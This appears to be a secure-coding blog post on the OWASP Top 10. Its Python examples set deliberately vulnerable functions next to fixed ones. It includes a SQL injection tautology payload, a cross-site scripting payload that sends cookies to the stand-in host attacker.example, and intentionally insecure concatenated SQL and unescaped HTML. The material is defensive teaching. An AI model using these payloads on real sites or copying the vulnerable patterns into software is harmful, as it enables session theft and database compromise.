OWASP stands for Open Web Application Security Project, a non-profit organization that publishes vendor-neutral guides, security best practices, tools and recommendations for building secure web applications.
Security is one of the most important parts of any application we develop, and in a world where most services are offered over the World Wide Web, web applications are an easy target for attackers. OWASP maintains a list of attacks on web applications here. It is the developers' responsibility to deliver code with no known security vulnerabilities. The OWASP guides and recommended practices are a starting point for understanding the specifics of web security vulnerabilities and for delivering secure code.
OWASP Developer Guide
Read the OWASP Secure Coding Practices guide here.
OWASP Top 10 Risks
OWASP identifies the ten most critical web application security risks and publishes the list here, refreshing it every few years. Though most of these vulnerabilities look very basic, statistics show they are the most commonly found and most exploited vulnerabilities in web applications. The ten risks in the 2017 list are as follows. (The categories below match the April 2017 release candidate of the list; the final 2017 edition dropped Insufficient Attack Protection, CSRF and Underprotected APIs as standalone categories and added XML External Entities (XXE), Insecure Deserialization and Insufficient Logging and Monitoring.)
- Injection
- Broken Authentication and Session Management
- Cross-Site Scripting (XSS)
- Broken Access Control
- Security Misconfiguration
- Sensitive Data Exposure
- Insufficient Attack Protection
- Cross-Site Request Forgery (CSRF)
- Using Components with Known Vulnerabilities
- Underprotected APIs
Injection
Injection flaws are among the most commonly found vulnerabilities in web applications. They include SQL, LDAP and OS command injection, where the application or a component passes untrusted input to an interpreter as part of a command or query, so an attacker can make the interpreter perform unintended actions.
Read more about SQL injection attacks and ways to prevent them in ASP.NET applications here.
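The following is an added example, not code from the original post or from OWASP, written in Python with the standard sqlite3 module rather than ASP.NET so that it runs stand-alone. It shows a login query built by string concatenation next to the same query with bound parameters, and runs a classic tautology payload against both. The table, the users and the payload are constructed for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory sample table; not data from any real application.
    Passwords are stored in clear only to keep the demo short; a real
    application stores a salted hash and compares against that."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO users (username, password) VALUES (?, ?)",
        [("alice", "s3cret"), ("admin", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Untrusted input is concatenated into the SQL text, so the database
    # parser treats quotes and keywords inside the input as part of the query.
    query = (
        "SELECT id FROM users WHERE username = '" + username
        + "' AND password = '" + password + "'"
    )
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameterised query: the statement text is fixed and the values are
    # bound separately, so the input is only ever compared as data.
    row = conn.execute(
        "SELECT id FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def demo() -> dict:
    conn = make_db()
    # Constructed tautology payload: it closes the quoted password literal and
    # appends a condition that is always true, so every row matches.
    payload = "' OR '1'='1"
    return {
        "vulnerable_valid_login": login_vulnerable(conn, "alice", "s3cret"),
        "vulnerable_with_payload": login_vulnerable(conn, "admin", payload),
        "safe_valid_login": login_safe(conn, "alice", "s3cret"),
        "safe_with_payload": login_safe(conn, "admin", payload),
    }


if __name__ == "__main__":
    print(demo())
```

With the payload as the password, the vulnerable version evaluates `username = 'admin' AND password = '' OR '1'='1'` and logs the attacker in as the first matching row; the parameterised version compares the literal string `' OR '1'='1` to the stored password and fails. The same principle applies to ADO.NET `SqlParameter` objects, LDAP filters and OS commands: keep the command fixed and pass data through the API's binding mechanism.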
Broken Authentication and Session Management
Application authentication and session management functions are often implemented incorrectly, which allows an attacker to compromise passwords, keys or session tokens and gain unauthorized access to the application's data and functions.
Cross-Site Scripting (XSS)
This is again caused by an application accepting untrusted data without proper validation or output encoding: an attacker inserts a malicious script into a page, and the victim's browser executes it with the victim's privileges when the victim views that page.
Read more about XSS attacks and ways to prevent them in ASP.NET applications here.
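The following is an added example, not code from the original post or from OWASP, written in Python so that it runs stand-alone. It renders a user comment with and without output encoding for the HTML element context, and shows that a URL attribute needs a separate rule because encoding alone does not neutralise a `javascript:` link. The attacker payload and host name are constructed for the demo.

```python
import html


def render_comment_vulnerable(comment: str) -> str:
    # Untrusted text is dropped straight into the HTML document.
    return '<div class="comment">' + comment + "</div>"


def render_comment_safe(comment: str) -> str:
    # HTML element context: encode &, <, >, " and ' so the browser displays
    # the text instead of parsing it as markup.
    return '<div class="comment">' + html.escape(comment, quote=True) + "</div>"


def render_profile_link_safe(url: str, label: str) -> str:
    # URL attribute context has its own rule: entity encoding does not stop a
    # javascript: URL, so allow only http(s) schemes, then attribute-encode.
    if not url.lower().lstrip().startswith(("http://", "https://")):
        url = "#"
    return '<a href="{}">{}</a>'.format(
        html.escape(url, quote=True), html.escape(label, quote=True)
    )


def contains_script_tag(markup: str) -> bool:
    # Crude check used by the demo to show whether the payload survived as markup.
    return "<script" in markup.lower()


# Constructed attacker input: sends the victim's cookie to an attacker-controlled host.
PAYLOAD = "<script>new Image().src='https://attacker.example/?c='+document.cookie</script>"


def demo() -> dict:
    return {
        "vulnerable_executes": contains_script_tag(render_comment_vulnerable(PAYLOAD)),
        "safe_executes": contains_script_tag(render_comment_safe(PAYLOAD)),
        "javascript_url_neutralised": render_profile_link_safe("javascript:alert(1)", "me"),
        "https_url_kept": render_profile_link_safe("https://example.com/u/1", "me"),
    }


if __name__ == "__main__":
    print(demo())
```

Encode at the point of output, not at input, and pick the encoder for the context (HTML body, attribute, JavaScript string, URL); Razor views in ASP.NET MVC HTML-encode `@` expressions by default, which covers only the first of these.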
Broken Access Control
This is caused by a faulty implementation of authorization, where the actions a user is allowed to perform are not properly enforced on the server. It may allow an attacker to view or modify other users' sensitive data, perform unauthorized functions, and so on.
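The following is an added example, not code from the original post or from OWASP, written in Python so that it runs stand-alone. It shows the most common form of broken access control, an insecure direct object reference: a handler that fetches an invoice by the id in the request without checking that the caller owns it, next to a version that checks ownership (or the admin role) and answers "not found" for both missing and forbidden ids. The `invoices` records and users are constructed for the demo.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    role: str  # "user" or "admin"


# Constructed sample records for a hypothetical "invoices" resource.
INVOICES = {
    1001: {"owner_id": 1, "amount": 120.00},
    1002: {"owner_id": 2, "amount": 75.50},
}


class NotFound(Exception):
    """Raised for both missing and forbidden records, so a caller cannot
    enumerate which ids exist by telling a 403 apart from a 404."""


def get_invoice_vulnerable(current_user: User, invoice_id: int) -> dict:
    # The caller is authenticated, but nothing ties the record to the caller:
    # changing the id in the URL returns another user's invoice.
    return INVOICES[invoice_id]


def can_read(current_user: User, invoice: dict) -> bool:
    # Deny by default; allow the owner, or an admin.
    return current_user.role == "admin" or invoice["owner_id"] == current_user.id


def get_invoice_safe(current_user: User, invoice_id: int) -> dict:
    invoice = INVOICES.get(invoice_id)
    if invoice is None or not can_read(current_user, invoice):
        raise NotFound(invoice_id)
    return invoice


def try_read(current_user: User, invoice_id: int) -> str:
    # Demo helper: reports the outcome instead of raising.
    try:
        get_invoice_safe(current_user, invoice_id)
        return "ok"
    except NotFound:
        return "denied"


def demo() -> dict:
    alice = User(id=1, role="user")
    admin = User(id=99, role="admin")
    return {
        "vulnerable_leaks_owner": get_invoice_vulnerable(alice, 1002)["owner_id"],
        "alice_own": try_read(alice, 1001),
        "alice_other": try_read(alice, 1002),
        "alice_missing": try_read(alice, 9999),
        "admin_other": try_read(admin, 1002),
    }


if __name__ == "__main__":
    print(demo())
```

The check belongs in the server-side data access path, not in the UI that hides links: an attacker does not use the UI. Centralising it in one function such as `can_read` also makes it testable and keeps the rule from being forgotten in a new endpoint.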
Security Misconfiguration
This risk occurs when the security settings of the application, its frameworks, the OS or the web servers are not properly configured, or are not patched regularly. Leaving a product's default settings in place (default accounts, sample pages, directory listing, verbose error pages) can also create a vulnerability an attacker can take advantage of.
Sensitive Data Exposure
This happens when sensitive data such as KYC information, payment details, etc. are not properly encrypted, in transit or at rest, or are exposed through weak authorization rules. There should also be a proper error handling mechanism: when the application fails, it should not expose technical error details (stack traces, connection strings, SQL text) that give an attacker additional information about the application's implementation.
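The following is an added example, not code from the original post or from OWASP, written in Python so that it runs stand-alone. It contrasts an error handler that returns the raw stack trace to the client with one that returns a generic message plus a reference id and writes the detail to the server log only, and adds a small helper that masks a card number so only the last four digits ever reach a response or a log line. The failing handler and its error text are constructed for the demo.

```python
import logging
import traceback
import uuid

log = logging.getLogger("app")


def mask_pan(pan: str) -> str:
    # Keep only the last four digits of a card number for display or logging.
    digits = "".join(ch for ch in pan if ch.isdigit())
    if len(digits) <= 4:
        return "****"
    return "*" * (len(digits) - 4) + digits[-4:]


def handle_request_vulnerable(handler) -> tuple:
    try:
        return 200, handler()
    except Exception:
        # Sends the stack trace (file paths, SQL, host names) to the client.
        return 500, traceback.format_exc()


def handle_request_safe(handler) -> tuple:
    try:
        return 200, handler()
    except Exception:
        ref = uuid.uuid4().hex[:12]
        # Full detail goes to the server-side log only, keyed by a reference
        # the support team can look up; the client gets a generic message.
        log.exception("unhandled error ref=%s", ref)
        return 500, {"error": "An internal error occurred", "ref": ref}


def failing_handler():
    # Constructed failure that mimics a database driver error carrying
    # connection details an attacker would find useful.
    raise RuntimeError("could not connect to db01.internal:5432 as user app_rw")


def demo() -> dict:
    _, body_vulnerable = handle_request_vulnerable(failing_handler)
    _, body_safe = handle_request_safe(failing_handler)
    return {
        "vulnerable_leaks_host": "db01.internal" in body_vulnerable,
        "safe_leaks_host": "db01.internal" in str(body_safe),
        "safe_has_reference": len(body_safe["ref"]) == 12,
        "masked_pan": mask_pan("4111 1111 1111 1111"),
    }


if __name__ == "__main__":
    print(demo())
```

In ASP.NET the equivalent of the vulnerable handler is leaving `customErrors` off (or detailed errors enabled) in production, so the framework's yellow error page reaches the user.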
Insufficient Attack Protection
The application should have some basic ability to detect and prevent common attacks. Beyond validating input, it should include components that respond to an attack in progress, for example by blocking the offending request or source, throttling repeated attempts, and raising alerts to operators.
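The following is an added example, not code from the original post or from OWASP, written in Python so that it runs stand-alone. It implements the detect-and-respond idea for one common attack, password guessing: failed logins are counted per client address in a sliding window, and crossing a threshold blocks the address for a period and records an alert. The thresholds, the clock injection and the client address (a documentation-range IP) are constructed for the demo.

```python
import time
from collections import defaultdict, deque

WINDOW_SECONDS = 60     # how far back failures are counted
MAX_FAILURES = 5        # failures within the window that trigger a block
BLOCK_SECONDS = 300     # how long the source stays blocked


class LoginGuard:
    """Tracks failed logins per client address, blocks a source that exceeds
    the threshold and records an alert for operators."""

    def __init__(self, clock=time.monotonic):
        self.clock = clock                     # injectable for testing
        self.failures = defaultdict(deque)     # ip -> timestamps of recent failures
        self.blocked_until = {}                # ip -> time the block expires
        self.alerts = []                       # messages an operator would receive

    def _prune(self, ip: str, now: float) -> None:
        q = self.failures[ip]
        while q and now - q[0] > WINDOW_SECONDS:
            q.popleft()

    def is_blocked(self, ip: str) -> bool:
        until = self.blocked_until.get(ip)
        if until is None:
            return False
        if self.clock() >= until:
            del self.blocked_until[ip]
            return False
        return True

    def record_failure(self, ip: str) -> None:
        now = self.clock()
        self._prune(ip, now)
        self.failures[ip].append(now)
        if len(self.failures[ip]) >= MAX_FAILURES:
            self.blocked_until[ip] = now + BLOCK_SECONDS
            self.alerts.append(
                f"possible brute force from {ip}: "
                f"{len(self.failures[ip])} failures in {WINDOW_SECONDS}s"
            )
            self.failures[ip].clear()

    def record_success(self, ip: str) -> None:
        # A successful login resets the counter for that source.
        self.failures[ip].clear()


def simulate() -> tuple:
    # Drive the guard with a fake clock so the demo needs no real waiting.
    now = [0.0]
    guard = LoginGuard(clock=lambda: now[0])
    ip = "203.0.113.7"  # constructed client address (documentation range)
    for _ in range(MAX_FAILURES):
        guard.record_failure(ip)
        now[0] += 1.0
    blocked_after_burst = guard.is_blocked(ip)
    now[0] += BLOCK_SECONDS + 1
    return blocked_after_burst, guard.is_blocked(ip), len(guard.alerts)


if __name__ == "__main__":
    print(simulate())
```

Blocking by source address alone is easy to evade from many addresses and can lock out legitimate users behind a shared NAT, so in practice it is paired with per-account throttling, and the alert feeds a monitoring system rather than a list in memory.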
Cross-Site Request Forgery (CSRF)
Cross-Site Request Forgery is performed by making the victim's browser send a forged request, for example from a page or script the attacker controls, that carries the victim's session cookie, so the application performs an action the victim is authorized to do but did not intend.
Read What is XSRF or CSRF Attack? How to Prevent CSRF or XSRF in Asp.Net MVC? to learn more about CSRF attacks and how to prevent them in ASP.NET MVC.
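The following is an added example, not code from the original post or from OWASP, written in Python so that it runs stand-alone. It shows a funds-transfer handler that trusts the session cookie alone, and the same handler protected with a synchronizer token that is bound to the session by an HMAC, which is the pattern behind ASP.NET MVC's anti-forgery token. The session store, the secret key and the request dictionaries are constructed for the demo.

```python
import hashlib
import hmac
import secrets

# Assumption: a server-side key; a real deployment loads it from configuration.
SECRET_KEY = secrets.token_bytes(32)
# Constructed session store: session id -> user name.
SESSIONS = {"sess-7f3a": "alice"}


def issue_csrf_token(session_id: str) -> str:
    # Token = random nonce plus an HMAC over (session id, nonce). Binding it
    # to the session means a token from another session fails to verify, and
    # the server does not have to store a token per rendered form.
    nonce = secrets.token_hex(16)
    mac = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return f"{nonce}.{mac}"


def verify_csrf_token(session_id: str, token: str) -> bool:
    nonce, sep, mac = token.partition(".")
    if not sep:
        return False
    expected = hmac.new(SECRET_KEY, f"{session_id}:{nonce}".encode(), hashlib.sha256).hexdigest()
    return hmac.compare_digest(mac, expected)  # constant-time comparison


def transfer_vulnerable(request: dict) -> int:
    # Only the session cookie is checked. The browser attaches that cookie to
    # a forged cross-site POST as well, so the forged request succeeds.
    if request["cookies"].get("session") not in SESSIONS:
        return 401
    return 200


def transfer_safe(request: dict) -> int:
    session = request["cookies"].get("session")
    if session not in SESSIONS:
        return 401
    # The token travels in the form body, which the attacker's page can
    # neither read nor guess, and the browser does not add it automatically.
    if not verify_csrf_token(session, request["form"].get("csrf_token", "")):
        return 403
    return 200


def demo() -> dict:
    token = issue_csrf_token("sess-7f3a")
    legitimate = {"cookies": {"session": "sess-7f3a"},
                  "form": {"to": "bob", "amount": "10", "csrf_token": token}}
    forged = {"cookies": {"session": "sess-7f3a"},
              "form": {"to": "attacker", "amount": "1000"}}
    return {
        "vulnerable_forged": transfer_vulnerable(forged),
        "safe_forged": transfer_safe(forged),
        "safe_legitimate": transfer_safe(legitimate),
        "token_reused_for_other_session": verify_csrf_token("sess-other", token),
    }


if __name__ == "__main__":
    print(demo())
```

Setting the `SameSite` attribute on the session cookie is a useful second layer, but the token check is what makes the defence independent of browser behaviour.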
Using Components with Known Vulnerabilities
When an application uses a component or library that has a known vulnerability, the whole application inherits it and may be seriously exploited. These days we use many open-source reusable components, so there is a higher chance that an attacker who knows a component's weaknesses can target your application. Keep an inventory of the components and versions in use and check it against published advisories on a regular basis.
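The following is an added example, not code from the original post or from OWASP, written in Python so that it runs stand-alone. It performs the basic check a dependency audit tool makes: read the pinned component versions from a requirements file, compare each against an advisory feed's "fixed in" version, and report the ones that are older. The package names, versions and advisory ids are hypothetical and constructed for the demo, not real advisories.

```python
# Constructed advisory feed with hypothetical packages and ids (not real CVEs).
ADVISORIES = [
    {"id": "EX-2017-001", "package": "examplelib", "fixed_in": "2.3.1"},
    {"id": "EX-2017-002", "package": "jsonthing", "fixed_in": "1.0.5"},
]

# Constructed requirements file in pip's "name==version" pin format.
REQUIREMENTS = """\
# application dependencies
examplelib==2.2.0
jsonthing==1.0.5
otherpkg==4.1.0
"""


def parse_version(version: str) -> tuple:
    # Dotted numeric versions only (e.g. 2.3.1); enough for the demo feed.
    return tuple(int(part) for part in version.split("."))


def parse_requirements(text: str) -> dict:
    pins = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        name, _, version = line.partition("==")
        if not version:
            # An unpinned dependency cannot be audited, and may silently change.
            raise ValueError(f"unpinned dependency: {line}")
        pins[name.strip().lower()] = version.strip()
    return pins


def find_vulnerable(pins: dict, advisories: list) -> list:
    findings = []
    for adv in advisories:
        installed = pins.get(adv["package"].lower())
        if installed is None:
            continue
        if parse_version(installed) < parse_version(adv["fixed_in"]):
            findings.append((adv["package"], installed, adv["id"], adv["fixed_in"]))
    return findings


def audit() -> list:
    return find_vulnerable(parse_requirements(REQUIREMENTS), ADVISORIES)


if __name__ == "__main__":
    for package, installed, advisory_id, fixed_in in audit():
        print(f"{package} {installed}: {advisory_id}, upgrade to {fixed_in}")
```

Real tooling such as OWASP Dependency-Check does the same comparison against public vulnerability databases and handles the messier version schemes; the point of the check is that it runs in the build, so an old component fails the pipeline instead of reaching production.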
Underprotected APIs
APIs are becoming an integral part of every application we develop, and APIs with vulnerabilities are easily exploited, often by automated tooling rather than through a browser. Proper authentication, authorization, input validation and rate limiting should be built in when delivering public-facing APIs, to prevent attacks.
Recommended Reading
- Understanding Web Security Vulnerabilities and Preventing it in Web Applications
- OWASP Developer Guide
- OWASP .Net Project – For building secure .NET web applications
- OWASP WebGoat Project – Deliberately insecure sample applications (Java and .NET versions) that contain the common web security vulnerabilities, for learning